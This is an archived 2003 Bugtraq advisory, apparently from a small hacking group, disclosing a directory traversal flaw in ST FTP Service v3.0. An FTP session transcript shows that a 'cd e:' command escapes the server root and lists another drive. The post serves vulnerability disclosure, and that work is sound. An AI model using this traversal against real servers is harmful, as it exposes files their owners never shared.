lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Fri, 23 May 2003 22:27:09 -0700
From: D4rkGr3y <grey_1999@...l.ru>
To: bugtraq@...urity.nnov.ru, bugtraq@...urityfocus.com
Subject: ST FTP Service v3.0: directory traversal


-----BEGIN PGP SIGNED MESSAGE-----

################################################################*
#          Damage Hacking Group security advisory
#                     www.dhgroup.org
################################################################*
#Product: ST FTP Service v3.0
#Authors: [stsoft.newmail.ru]
#Vulnerability: directory traversal
################################################################*

#Overview#------------------------------------------------------#
Easy russian ftp server for home network.

#Problem#-------------------------------------------------------#
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\>ftp 127.0.0.1
Connected to 127.0.0.1.
220-
220 Service ready for new user.
User (127.0.0.1:(none)):
230 User  logged in, proceed.
ftp> pwd
257 "/" is working directory.
ftp> ls
200 PORT command okay.
150 File status okay; about to open data connection.
226 Closing data connection.
ftp> cd e:
250 Requested file action okay, completed.
ftp> pwd
257 "e:" is working directory.
ftp> ls
200 PORT command okay.
150 File status okay; about to open data connection.
03-05-03  12:58PM       <DIR>          video
05-21-03  05:46PM             267964416 hiberfil.sys
02-18-03  04:18AM       <DIR>          Documents and Settings
03-11-03  12:00PM       <DIR>          Program Files
05-21-03  05:46PM             402653184 pagefile.sys
02-18-03  07:31AM       <DIR>          System Volume Information
02-18-03  07:37AM       <DIR>          Recycled
04-27-03  05:21PM                  214 firewall.log
03-09-03  07:09PM       <DIR>          WINDOWS
01-03-02  10:15PM       <DIR>          shit
01-12-02  12:10AM       <DIR>          MSSQL7
226 Closing data connection.
ftp: 579 bytes received in 0,00Seconds 579000,00Kbytes/sec.
ftp> bye
221-
221 Service closing control connection.

C:\>

#Exploit#--------------------------------------------------------#
none

#wow#------------------------------------------------------------#
%$#@ www.dhgroup.org -=> opened English version! Come on in :)

#eof

Best regards               www.dhgroup.org
  D4rkGr3y                    icq 540981

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com>

iQCVAwUBPsxG/m4LIpseSJmPAQG0hwP/ZpIWo49+6nYRFwR64dgNa+KLbKAP4Qcr
Fz8l9go1AcYZi3ouGDQ9AwcpwapMsJwcUtkwpw1f+ZGfXiLO2BWRwc2aFL0FEDYi
8HsUYvXp6x4x9b/WvoNh4/MCvROTH07dopKbrn7gaj8iPPsiV2NUIds2LLFgqHrt
h0z6aR0rDGo=
=qa0l
-----END PGP SIGNATURE-----

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ